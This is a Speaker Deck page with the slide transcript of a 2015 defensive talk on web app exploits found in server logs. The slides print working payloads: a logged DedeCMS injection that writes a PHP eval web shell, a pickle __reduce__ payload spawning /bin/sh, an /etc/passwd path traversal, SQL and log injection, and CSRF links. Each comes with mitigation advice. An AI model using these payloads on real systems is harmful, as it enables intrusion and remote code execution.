Upgrade to Pro — share decks privately, control downloads, hide ads and more …

App Exploits: Deconstructing for Good, Not Evil

Joël Perras
February 20, 2015
Technology
0
85

App Exploits: Deconstructing for Good, Not Evil

If your web application exists on the public Internet, someone *will* try to exploit it.
Many of these are un-targeted & scripted, their authors hoping that their target will fall to one of the hundreds of un-patched vulnerabilities in frameworks, blog engines or storefronts. Let's go through some common and uncommon exploits in the wild, starting from their traces in server logs, and see how we can detect them and better protect ourselves.

Joël Perras

February 20, 2015
Tweet

More Decks by Joël Perras

See All by Joël Perras
Run Absolutely Everything* With uWSGI
jperras
0
410
An Introduction to Configuration Management with SaltStack
jperras
1
380
Large-Scale Applications with Flask: Doing More With Less
jperras
29
4.1k
Graphs, Edges & Nodes: Untangling the Social Web
jperras
8
860

Other Decks in Technology

See All in Technology
Lambdaと地方とコミュニティ
miu_crescent
2
370
Oracle Cloud Infrastructure データベース・クラウド:各バージョンのサポート期間
oracle4engineer
PRO
28
12k
AWS Lambda のトラブルシュートをしていて思うこと
kazzpapa3
2
170
OCI Vault 概要
oracle4engineer
PRO
0
9.7k
個人でもIAM Identity Centerを使おう!(アクセス管理編)
ryder472
3
200
Terraform Stacks入門 #HashiTalks
msato
0
350
Why does continuous profiling matter to developers? #appdevelopercon
salaboy
0
180
インフラとバックエンドとフロントエンドをくまなく調べて遅いアプリを早くした件
tubone24
1
430
Making your applications cross-environment - OSCG 2024 NA
salaboy
0
180
[CV勉強会@関東 ECCV2024 読み会] オンラインマッピング x トラッキング MapTracker: Tracking with Strided Memory Fusion for Consistent Vector HD Mapping (Chen+, ECCV24)
abemii
0
220
なぜ今 AI Agent なのか _近藤憲児
kenjikondobai
4
1.3k
AWS Lambdaと歩んだ“サーバーレス”と今後 #lambda_10years
yoshidashingo
1
170

Featured

See All Featured
Building a Scalable Design System with Sketch
lauravandoore
459
33k
Side Projects
sachag
452
42k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
109
49k
Gamification - CAS2011
davidbonilla
80
5k
What's new in Ruby 2.0
geeforr
343
31k
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
232
17k
How to Think Like a Performance Engineer
csswizardry
20
1.1k
Evolution of real-time – Irina Nazarova, EuRuKo, 2024
irinanazarova
4
370
GitHub's CSS Performance
jonrohan
1030
460k
The Straight Up "How To Draw Better" Workshop
denniskardys
232
140k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
27
4.3k
Mobile First: as difficult as doing things right
swwweet
222
8.9k

Transcript

  1. App Exploits DECONSTRUCTED – FOR GOOD, NOT FOR EVIL. By

    Joël, from Fictive Kin

  2. Not if, but when. IT’S ONLY A MATTER OF TIME

  3. A long time ago, IN A HOTEL FAR, FAR AWAY…

  4. None

  5. Of course, he obviously tried to just use any (valid)

    room number with a generic name.

  6. 201 Smith

  7. Overly verbose error messages are the best friend of any

    attacker.

  8. 201 Smith Please verify with the front desk your room

    has been properly checked in and your last name correctly spelled in the hotel registration system.

  9. “Please verify with the front desk your room has been

    properly checked in and your last name correctly spelled in the hotel registration system.”

  10. SELECT  COUNT(id)   FROM  current_guests   WHERE  room_number  =  201

      AND  guest_last_name  =  ‘Smith’;

  11. WHERE  A  AND  B

  12. WHERE  A  AND  B  OR  True

  13. WHERE  (A  AND  B)  OR  True

  14. SELECT  COUNT(id)   FROM  current_guests   WHERE  room_number  =  201

      AND  guest_last_name  =  ‘lolpwned’   OR  1=1;

  15. 201 ‘ OR 1=1;

  16. The lesson here is… DON’T BE LAZY.

  17. The lesson here is… SECURITY IS HARD.

  18. The lesson here is… THAT THERE ARE MANY LESSONS.

  19. Injection Serialization Path Traversal Cross Site Scripting Cross Site Request

    Forgery

  20. Injection Attacks COME IN MANY FLAVOURS

  21. SQL INJECTIONS SANITIZE YOUR INPUTS

  22. 10.58.17.55  -­‐  -­‐  [20/Feb/2015:16:19:35  +0000]  "GET  /page?product_id=arrs1%5B%5D%3D99%26arrs1%5B%5D %3D102%26arrs1%5B%5D%3D103%26arrs1%5B%5D%3D95%26arrs1%5B%5D%3D100%26arrs1%5B%5D%3D98%26arrs1%5B%5D %3D112%26arrs1%5B%5D%3D114%26arrs1%5B%5D%3D101%26arrs1%5B%5D%3D102%26arrs1%5B%5D%3D105%26arrs1%5B%5D %3D120%26arrs2%5B%5D%3D109%26arrs2%5B%5D%3D121%26arrs2%5B%5D%3D116%26arrs2%5B%5D%3D97%26arrs2%5B%5D

    %3D103%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D97%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D44%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D120%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D98%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D121%26arrs2%5B%5D %3D44%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D114%26arrs2%5B%5D%3D109%26arrs2%5B%5D %3D98%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D121%26arrs2%5B%5D%3D41%26arrs2%5B%5D %3D32%26arrs2%5B%5D%3D86%26arrs2%5B%5D%3D65%26arrs2%5B%5D%3D76%26arrs2%5B%5D%3D85%26arrs2%5B%5D %3D69%26arrs2%5B%5D%3D83%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D49%26arrs2%5B%5D%3D50%26arrs2%5B%5D %3D51%26arrs2%5B%5D%3D52%26arrs2%5B%5D%3D53%26arrs2%5B%5D%3D54%26arrs2%5B%5D%3D44%26arrs2%5B%5D %3D64%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D92%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D96%26arrs2%5B%5D %3D44%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D123%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D %3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D58%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D125%26arrs2%5B%5D%3D102%26arrs2%5B%5D%3D105%26arrs2%5B%5D%3D108%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D95%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D117%26arrs2%5B%5D%3D116%26arrs2%5B%5D %3D95%26arrs2%5B%5D%3D99%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D116%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D116%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D40%26arrs2%5B%5D %3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D120%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D118%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D46%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D44%26arrs2%5B%5D%3D39%26arrs2%5B%5D %3D39%26arrs2%5B%5D%3D60%26arrs2%5B%5D%3D63%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D118%26arrs2%5B%5D%3D97%26arrs2%5B%5D %3D108%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D36%26arrs2%5B%5D%3D95%26arrs2%5B%5D%3D80%26arrs2%5B%5D %3D79%26arrs2%5B%5D%3D83%26arrs2%5B%5D%3D84%26arrs2%5B%5D%3D91%26arrs2%5B%5D%3D120%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D117%26arrs2%5B%5D%3D105%26arrs2%5B%5D %3D93%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D59%26arrs2%5B%5D%3D63%26arrs2%5B%5D%3D62%26arrs2%5B%5D %3D120%26arrs2%5B%5D%3D105%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D117%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D59%26arrs2%5B%5D %3D123%26arrs2%5B%5D%3D47%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D100%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D58%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D%3D112%26arrs2%5B%5D %3D125%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D35%26arrs2%5B%5D %3D32%26arrs2%5B%5D%3D64%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D92%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D96…

  23. 10.58.17.55  -­‐  -­‐  [20/Feb/2015:16:19:35  +0000]  "GET  /page?product_id=arrs1%5B%5D%3D99%26arrs1%5B%5D %3D102%26arrs1%5B%5D%3D103%26arrs1%5B%5D%3D95%26arrs1%5B%5D%3D100%26arrs1%5B%5D%3D98%26arrs1%5B%5D %3D112%26arrs1%5B%5D%3D114%26arrs1%5B%5D%3D101%26arrs1%5B%5D%3D102%26arrs1%5B%5D%3D105%26arrs1%5B%5D %3D120%26arrs2%5B%5D%3D109%26arrs2%5B%5D%3D121%26arrs2%5B%5D%3D116%26arrs2%5B%5D%3D97%26arrs2%5B%5D

    %3D103%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D97%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D44%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D120%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D98%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D121%26arrs2%5B%5D %3D44%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D114%26arrs2%5B%5D%3D109%26arrs2%5B%5D %3D98%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D121%26arrs2%5B%5D%3D41%26arrs2%5B%5D %3D32%26arrs2%5B%5D%3D86%26arrs2%5B%5D%3D65%26arrs2%5B%5D%3D76%26arrs2%5B%5D%3D85%26arrs2%5B%5D %3D69%26arrs2%5B%5D%3D83%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D49%26arrs2%5B%5D%3D50%26arrs2%5B%5D %3D51%26arrs2%5B%5D%3D52%26arrs2%5B%5D%3D53%26arrs2%5B%5D%3D54%26arrs2%5B%5D%3D44%26arrs2%5B%5D %3D64%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D92%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D96%26arrs2%5B%5D %3D44%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D123%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D %3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D58%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D125%26arrs2%5B%5D%3D102%26arrs2%5B%5D%3D105%26arrs2%5B%5D%3D108%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D95%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D117%26arrs2%5B%5D%3D116%26arrs2%5B%5D %3D95%26arrs2%5B%5D%3D99%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D116%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D116%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D40%26arrs2%5B%5D %3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D120%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D118%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D46%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D44%26arrs2%5B%5D%3D39%26arrs2%5B%5D %3D39%26arrs2%5B%5D%3D60%26arrs2%5B%5D%3D63%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D118%26arrs2%5B%5D%3D97%26arrs2%5B%5D %3D108%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D36%26arrs2%5B%5D%3D95%26arrs2%5B%5D%3D80%26arrs2%5B%5D %3D79%26arrs2%5B%5D%3D83%26arrs2%5B%5D%3D84%26arrs2%5B%5D%3D91%26arrs2%5B%5D%3D120%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D117%26arrs2%5B%5D%3D105%26arrs2%5B%5D %3D93%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D59%26arrs2%5B%5D%3D63%26arrs2%5B%5D%3D62%26arrs2%5B%5D %3D120%26arrs2%5B%5D%3D105%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D117%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D59%26arrs2%5B%5D %3D123%26arrs2%5B%5D%3D47%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D100%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D58%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D%3D112%26arrs2%5B%5D %3D125%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D35%26arrs2%5B%5D %3D32%26arrs2%5B%5D%3D64%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D92%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D96…

  24. arrs1%5B%5D%3D99 URLENCODED

  25. arrs1[]=99 QUERY ARGS ARE KEY/VAL PAIRS OF ARRAYS AND INTEGERS

  26. arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[] =112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109 &arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[ ]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&a rrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[] =110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100& arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=8 5&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=49&arrs2[]=50&arrs2[]=51&arrs2[]= 52&arrs2[]=53&arrs2[]=54&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[] =39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arr

    s2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]= 125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&a rrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[] =116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&a rrs2[]=39&arrs2[]=120&arrs2[]=115&arrs2[]=118&arrs2[]=105&arrs2[]=112&arrs2[ ]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&ar rs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=11 2&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2 []=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs 2[]=120&arrs2[]=105&arrs2[]=110&arrs2[]=115&arrs2[]=117&arrs2[]=105&arrs2[]= 93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=120&arrs2[]=105&arrs2 []=110&arrs2[]=115&arrs2[]=117&arrs2[]=105&arrs2[]=39&arrs2[]=39&arrs2[]=41& arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[ ]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39& arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92 &arrs2[]=39&arrs2[]=96

  27. arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[] =112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109 &arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[ ]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&a rrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[] =110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100& arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=8 5&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=49&arrs2[]=50&arrs2[]=51&arrs2[]= 52&arrs2[]=53&arrs2[]=54&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[] =39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arr

    s2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]= 125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&a rrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[] =116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&a rrs2[]=39&arrs2[]=120&arrs2[]=115&arrs2[]=118&arrs2[]=105&arrs2[]=112&arrs2[ ]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&ar rs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=11 2&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2 []=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs 2[]=120&arrs2[]=105&arrs2[]=110&arrs2[]=115&arrs2[]=117&arrs2[]=105&arrs2[]= 93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=120&arrs2[]=105&arrs2 []=110&arrs2[]=115&arrs2[]=117&arrs2[]=105&arrs2[]=39&arrs2[]=39&arrs2[]=41& arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[ ]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39& arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92 &arrs2[]=39&arrs2[]=96

  28. 99,  102,  103,  95,  100,  98,  112,  114,  101,  102,

      105,  120,  109,  121,  116,  97,  103,  96,  32,  40,   97,  105,  100,  44,  101,  120,  112,  98,  111,  100,   121,  44,  110,  111,  114,  109,  98,  111,  100,   121,  41,  32,  86,  65,  76,  85,  69,  83,  40,  49,   50,  51,  52,  53,  54,  44,  64,  96,  92,  39,  96,   44,  39,  123,  100,  101,  100,  101,  58,  112,  104,   112,  125,  102,  105,  108,  101,  95,  112,  117,   116,  95,  99,  111,  110,  116,  101,  110,  116,   115,  40,  39,  39,  120,  115,  118,  105,  112,  46,   112,  104,  112,  39,  39,  44,  39,  39,  60,  63,   112,  104,  112,  32,  101,  118,  97,  108,  40,  36,   95,  80,  79,  83,  84,  91,  120,  105,  110,  115,   117,  105,  93,  41,  59,  63,  62,  120,  105,  110,   115,  117,  105,  39,  39,  41,  59,  123,  47,  100,   101,  100,  101,  58,  112,  104,  112,  125,  39,  41,   32,  35,  32,  64,  96,  92,  39,  96

  29. In  [1]:  input  =  "arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95…"   In  [2]:  parsed  =

     input.split('&')   In  [3]:  v  =  [int(p.split('=')[1])  for  p  in  parsed  if  p  is  not  '']   In  [4]:  print  ''.join(chr(i)  for  i  in  v)  

  30. cfg_dbprefixmytag`  (aid,expbody,normbody)   VALUES(123456,@`\'`,'{dede:php} file_put_contents(''xsvip.php'',''<?php   eval($_POST[xinsui]);?>xinsui'');{/dede:php}')  #  @`\'`

  31. cfg_dbprefixmytag`  (aid,expbody,normbody)   VALUES(123456,@`\'`,'{dede:php} file_put_contents(''xsvip.php'',''<?php   eval($_POST[xinsui]);?>xinsui'');{/dede:php}')  #  @`\'`

  32. cfg_dbprefixmytag`  (aid,expbody,normbody)   VALUES(123456,@`\'`,'{dede:php} file_put_contents(''xsvip.php'',''<?php   eval($_POST[xinsui]);?>xinsui'');{/dede:php}')  #  @`\'`

  33. cfg_dbprefixmytag`  (aid,expbody,normbody)   VALUES(123456,@`\'`,'{dede:php} file_put_contents(''xsvip.php'',''<?php   eval($_POST[xinsui]);?>xinsui'');{/dede:php}')  #  @`\'`

  34. None

  35. In Communist China, CMS HACK YOU!

  36. The lesson here is… SANITIZE YOUR INPUTS! ESCAPE YOUR OUTPUTS!

  37. EX POST FACTO DETECTION LOG INVALID DATABASE QUERIES.

  38. LOG INJECTIONS COVERING UP THE DETAILS

  39. def  log_failed_login(username):          with  open("access.log",  'a')  as

     f:                  f.write("User  login  failed  for:  %s\n"  %  username)  

  40. guest\nUser  login  succeeded  for:  admin Here’s my username

  41. User  login  failed  for:  guest\n   User  login  succeeded  for:

     admin\n

  42. The lesson here is… SANITIZE YOUR INPUTS! ESCAPE YOUR OUTPUTS!

  43. Serialization Attacks …ALSO COME IN SEVERAL FLAVOURS.

  44. Object Serialization DON’T TRUST YOUR OWN CACHE

  45. <?php   $messages  =  array("sekret"  =>  ‘blue’);   echo  serialize($messages);

      ?>

  46. a:1:{s:6:"sekret";s:4:"blue";}

  47. PHP unserialize() can instantiate objects. Serializing objects containing user input

    is, fundamentally, dangerous.

  48. Magic Methods will be your downfall __wakeup(), __destruct()

  49. http://www.slideshare.net/phdays/php-wordpress

  50. http://www.slideshare.net/phdays/php-wordpress

  51. http://www.slideshare.net/phdays/php-wordpress

  52. Object Serialization …IN YOUR COOKIES.

  53. People forget that users can (sometimes) modify cookies $_COOKIE

  54. a:2:{s:2:"id";s:1:"1";s:4:"name";s:4:"Joel";} array("id" => '1', 'name' => 'Joel')

  55. PHP is not Alone PYTHON cPICKLE HAS SIMILAR ISSUES

  56. class AuthedProtocol(protocol.Protocol): def verify(self, headers): try: token = cPickle.loads(base64.b64decode(headers['AuthToken'])) if

    not check_hmac(token['signature'], token['data'], getSecretKey()): raise SomeError self.secure_data = token['data'] except: raise SomeError

  57. class AuthedProtocol(protocol.Protocol): def verify(self, headers): try: token = cPickle.loads(base64.b64decode(headers['AuthToken'])) if

    not check_hmac(token['signature'], token['data'], getSecretKey()): raise SomeError self.secure_data = token['data'] except: raise SomeError

  58. import cPickle, subprocess, base64 class Hackzor(object): def __reduce__(self): return (subprocess.Popen,

    (('/bin/sh',),))

  59. AuthToken: Y3N1YnByb2Nlc3MKUG9wZW4KcDEKKChTJy9iaW4vc2gnCnAyCnRwMwp0cDQKUnA1Ci4= base64.b64encode(cPickle.dumps(RunBinSh()))

  60. Path Traversals FILES THAT SHOULDN’T BE SEEN

  61. $pdf  =  $_GET[‘pdf’];   $filename  =  “/var/www/$pdf”;   readfile($filename);

  62. GET /documents?pdf=../../etc/passwd

  63. $pdf  =  $_GET[‘pdf’];   $filename  =  “/var/www/../../etc/passwd”;   readfile($filename);

  64. The lesson here is… SANITIZE YOUR INPUTS! LIMIT SURFACE AREA

    (open_basedir etc.) PERMISSIONS MEAN THINGS! CHROOT IS YOUR FRIEND!

  65. CSRF …OR WHEN EVERYONE LIKED HAVING SEX WITH GOATS ON

    TWITTER
  66. None

  67. CSRF requires some social engineering “Hey, click this link for

    free money!”

  68. href=“/status?update=LOLPWNED”

  69. href=“/account?transfer=1billion&to=jperras”

  70. The lesson here is… USE CSRF TOKENS PER REQUEST! Access-Control-Allow-Origin!

  71. What’s a developer to do?

  72. Logging, logging, logging Intrusion Detection System (IDS) Security Mailing Lists

    Error notification systems (Sentry) … try to be smarter

  73. @jperras Joël Perras http://nerderati.com

  74. joind.in/13329